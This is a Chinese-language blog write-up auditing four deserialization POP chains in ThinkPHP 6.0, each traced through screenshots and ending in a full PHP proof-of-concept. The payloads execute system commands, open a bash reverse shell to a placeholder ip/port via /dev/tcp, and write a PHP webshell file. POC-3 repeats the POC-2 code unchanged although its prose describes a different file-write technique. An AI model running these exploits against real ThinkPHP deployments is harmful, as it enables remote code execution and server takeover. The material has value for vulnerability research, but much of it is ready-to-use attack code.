前言
在使用thinkphp开发自己的后台管理系统后,刚刚好知识储备足够来审计thinkphp的链子,便在本地搭建了thinkphp6.0来分析反序列化POP链
POP-1
利用链如下:
data:image/s3,"s3://crabby-images/48014/4801467688c3767a5e522385f3fda41be26642ee" alt=""
触发点位于:/vendor/topthink/think-orm/src/Model.php
data:image/s3,"s3://crabby-images/9239a/9239a835195dcca127e5b096630b7c602dcaffe7" alt=""
查看$this->save()方法调用情况
data:image/s3,"s3://crabby-images/39a0d/39a0ddbed61a98401aab25ec7139151fe2d9e153" alt=""
此处的$this->setAttrs($data)为数据赋值类操作,看到下面一个if语句,还要往下走,不能进入到if语句内return。 又因为这里为或,所以只需要绕过这里的两个if条件其中一个。
data:image/s3,"s3://crabby-images/2aca4/2aca493b16cc34a8acffd6e70b2ea24efeef69d8" alt=""
查看$this->updateData()调用情况。
data:image/s3,"s3://crabby-images/e2f9b/e2f9b5d97f36b30590c295eda37beec5ae3614fc" alt=""
$this->checkAllowFields()上面的条件基本满足,直接查看checkAllowFields方法调用情况。
data:image/s3,"s3://crabby-images/cebb8/cebb85fc12c8121ddd66b3015f0a44f5835bee68" alt=""
两个if初始值可以满足,不做修改。进一步可以看到$this->table . $this->suffix使用字符串拼接,找一个有__tostring方法的类做跳板。
data:image/s3,"s3://crabby-images/b82ad/b82adbc8060c4fc914e81623c9f282e799bd8d2d" alt=""
可以看到眼睛快坏掉了,lol
data:image/s3,"s3://crabby-images/b9d68/b9d681ba926d147f934b8cf6540ee3a8e1b69332" alt=""
很自然地进入$this->toArray(),看一下它在干什么
data:image/s3,"s3://crabby-images/9c3a8/9c3a882d42fbfdbd599643eaff46e2efdfc3ee80" alt=""
要想进入$this->getAttr($key),必须要绕过两个if条件
data:image/s3,"s3://crabby-images/278fa/278fa72e0fd9f5ad5a74d0daf8dd69c319490648" alt=""
看一下两个for循环里面的if,只要下标对应的键值不为字符串即可
data:image/s3,"s3://crabby-images/5a080/5a0805db695045e4de40ebcfb6396f02d3c2f402" alt=""
合并后的数组中的下标传入$this->getAttr($key),看一下该方法的调用
data:image/s3,"s3://crabby-images/d91af/d91afacfa3c66b9648ce5fdf199c9dda13f44a0a" alt=""
进入$this->getData($name),从$this->data[$fieldName]通过下标获取键值返回进入$this->getValue($name, $value, $relation)。
data:image/s3,"s3://crabby-images/9a25c/9a25c3f91fddeb92c00d0809920c8ebde83046fa" alt=""
查看$this->getValue($name, $value, $relation)方法的调用
data:image/s3,"s3://crabby-images/3e70b/3e70b42fdc37ef5ac327f0da28453b617645c49e" alt=""
POC-1如下:
<?php
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave;
private $exists;
protected $table;
protected $visible;
private $force;
private $withAttr;
public function __construct($obj)
{
$this->lazySave = true;
$this->data = [
'17man' => 'whoami'
];
$this->exists = true;
$this->table = $obj;
$this->visible = [
['17man' => 'visible']
];
$this->withAttr = ['17man' => 'system'];
}
}
namespace think\model\concern;
trait Attribute
{
}
namespace think\Model;
use think\Model;
class Pivot extends Model
{
}
$object = new Pivot('');
$pwn = new Pivot($object);
echo urlencode(serialize($pwn));
?>
POP-2
利用链如下:
/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php::__destruct()
/vendor/topthink/framework/src/think/filesystem/CacheStore.php::save()
/vendor/topthink/framework/src/think/cache/driver.php::set()
/vendor/topthink/framework/src/think/cache/driver.php::serialize()
搜索全局__destruct()方法,找到/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php
data:image/s3,"s3://crabby-images/260ef/260ef6c1d71667cb8ff64e21ccc93f4ce2745ff9" alt=""
data:image/s3,"s3://crabby-images/260ef/260ef6c1d71667cb8ff64e21ccc93f4ce2745ff9" alt=""
因为AbstractCache为抽象类,所以找一下它的子类
data:image/s3,"s3://crabby-images/c53b9/c53b9aadca348b9dc0280b67d28a541d51ff7669" alt=""
看到子类CacheStore中的save方法
data:image/s3,"s3://crabby-images/b142c/b142cf1c5646e1bc4ef36e9f835fde1a2a5f91c0" alt=""
查看cleanContents调用情况,只要不是嵌套数组,就可以直接return回来
data:image/s3,"s3://crabby-images/6605d/6605db7cb14f0fb941f79c74be76a81ca1aa6cfc" alt=""
返回json编码后的数据,进入set方法。 在条件足够利用的情况下,坚持能不进就不进原则。绕过第一个if语句,进入getCacheKey($name)方法。
data:image/s3,"s3://crabby-images/c7327/c7327cdac7a30ad2ad199a5b741692ae7d298fde" alt=""
$this->options = ['hash_type']不能为空,别问我怎么知道的。 接着,返回进去serialize($value)方法
data:image/s3,"s3://crabby-images/6116a/6116a38e3f2cab2bb29110c3187b06182f8daa45" alt=""
这里利用点其实就是$fun($value),$fun跟$value都可控,谁让PHP是世界上最好都语言呢? 不过需要注意的是这里的$value是json编码后的数组,用的是linux下反引号执行。 选择反弹shell是因为这里会因为[]"这几个符号报错,无法回显ls这类指令的输出。 当然,我一开始用trim测试去掉[]"这几个符号,但还是行不通。
data:image/s3,"s3://crabby-images/78b8e/78b8ee1e019053571ce9ae4c69f1f7d955c49fe8" alt=""
POC-2如下:
<?php
namespace League\Flysystem\Cached\Storage;
abstract class AbstractCache
{
protected $autosave = false;
protected $cache = ['`bash -i >& /dev/tcp/ip/port 0>&1`'];
}
namespace think\filesystem;
use League\Flysystem\Cached\Storage\AbstractCache;
class CacheStore extends AbstractCache
{
protected $store;
protected $key;
protected $expire;
public function __construct($obj)
{
$this->store = $obj;
$this->key = '17';
$this->expire = 'expire';
}
}
namespace think\cache;
abstract class Driver
{
}
namespace think\cache\driver;
use think\cache\Driver;
use think\filesystem\CacheStore;
class File extends Driver
{
protected $options;
public function __construct()
{
$this->options = [
'expire' => 0,
'cache_subdir' => true,
'prefix' => '',
'path' => '',
'hash_type' => 'md5',
'data_compress' => false,
'tag_prefix' => 'tag:',
'serialize' => ['system'],
];
}
public function set($key, $value, $ttl = null): bool
{
// TODO: Implement set() method.
}
}
$object = new File();
$pwn = new CacheStore($object);
echo urlencode(serialize($pwn));
?>
POP-3
利用链与POP-2的一样,只不过用的是serialize($value)方法下面的 $result = file_put_contents($filename, $data)来写入shell。 我觉得你也跟我一样懒,所以我在这也贴一次。
/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php::__destruct()
/vendor/topthink/framework/src/think/filesystem/CacheStore.php::save()
/vendor/topthink/framework/src/think/cache/driver.php::set()
/vendor/topthink/framework/src/think/cache/driver.php::serialize()
既然有file_put_contents()函数,那么肯定要康康文件名跟内容参数怎么控制啦!
data:image/s3,"s3://crabby-images/686e8/686e826cdcaa42bfe8ac0cb38705de2a436abb51" alt=""
查看$this->getCacheKey($name)的调用情况,还是那个能不进就不进原则。 更何况这里两个if已经对我们文件名动手动脚的了(诶,有if我就不进,就是玩儿), 这里options['path']用伪协议,是因为写入内容拼接了exit,具体康康p神那篇伪协议文章。
data:image/s3,"s3://crabby-images/ad477/ad477db1bb5cfac8500c34de3bb82a1715d4c4fd" alt=""
这里要记得文件名跟加密方式,这里我用的是md5加密后的17man, 然后文件内容要加3个字符,因为base64编码4个字符一组。
data:image/s3,"s3://crabby-images/742df/742df0acc2250abf928f91f1d7ca08a44ef58f2f" alt=""
POC-3如下:
<?php
namespace League\Flysystem\Cached\Storage;
abstract class AbstractCache
{
protected $autosave = false;
protected $cache = ['`bash -i >& /dev/tcp/ip/port 0>&1`'];
}
namespace think\filesystem;
use League\Flysystem\Cached\Storage\AbstractCache;
class CacheStore extends AbstractCache
{
protected $store;
protected $key;
protected $expire;
public function __construct($obj)
{
$this->store = $obj;
$this->key = '17';
$this->expire = 'expire';
}
}
namespace think\cache;
abstract class Driver
{
}
namespace think\cache\driver;
use think\cache\Driver;
use think\filesystem\CacheStore;
class File extends Driver
{
protected $options;
public function __construct()
{
$this->options = [
'expire' => 0,
'cache_subdir' => true,
'prefix' => '',
'path' => '',
'hash_type' => 'md5',
'data_compress' => false,
'tag_prefix' => 'tag:',
'serialize' => ['system'],
];
}
public function set($key, $value, $ttl = null): bool
{
// TODO: Implement set() method.
}
}
$object = new File();
$pwn = new CacheStore($object);
echo urlencode(serialize($pwn));
?>
POP-4
利用链如下:
/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php::__destruct()
/vendor/league/flysystem-cached-adapter/src/Storage/Adapter.php::save()
/vendor/league/flysystem/src/Adapter/Local.php:has()
/vendor/league/flysystem/src/Adapter/Local.php:write()
触发点位于League\Flysystem\Cached\Storage\AbstractCache::__destruct()
data:image/s3,"s3://crabby-images/d2057/d205711e487d94791492c49e54bc450bf9274c18" alt=""
AbstractCache为抽象类,找一下它的子类Adapter利用
data:image/s3,"s3://crabby-images/32221/322213fb8f00661de6f6ea74172e6508c2a5d488" alt=""
看一下Adapter中的save()方法中,有一个write方法。$content为getForStorage方法返回值, 上文分析了该参数可控,所以可以用来写马。 我们只需要找到有has()跟write()方法的对象来利用。
data:image/s3,"s3://crabby-images/44713/44713e3bdb4d99356df6f4f6ef6e87deca635f61" alt=""
查看has()方法的调用情况,发现该方法用来判断文件是否已存在, 只要构建文件名不存在即可
data:image/s3,"s3://crabby-images/3efdf/3efdf3a6fe4b0a11bd8abe655de6cceb9226731d" alt=""
执行file_put_contents()函数,写入shell
data:image/s3,"s3://crabby-images/b63bb/b63bb982175e0497ddc09e2f1f495e514220e53f" alt=""
POC-4如下:
<?php
namespace League\Flysystem\Cached\Storage;
abstract class AbstractCache
{
protected $autosave = false;
protected $cache = ['<?php phpinfo();?>'];
}
namespace League\Flysystem\Cached\Storage;
class Adapter extends AbstractCache
{
protected $adapter;
protected $file;
public function __construct($obj)
{
$this->adapter = $obj;
$this->file = 'pwn.php';
}
}
namespace League\Flysystem\Adapter;
abstract class AbstractAdapter
{
}
namespace League\Flysystem\Adapter;
use League\Flysystem\Cached\Storage\Adapter;
use League\Flysystem\Config;
class Local extends AbstractAdapter
{
public function has($path)
{
}
public function write($path, $contents, Config $config)
{
}
}
$object = new Local();
$pwn = new Adapter($object);
echo urlencode(serialize($pwn));
?>
There Is Nothing Below
data:image/s3,"s3://crabby-images/e1204/e1204db1770ccffe2a43222720440f2a99c687ad" alt=""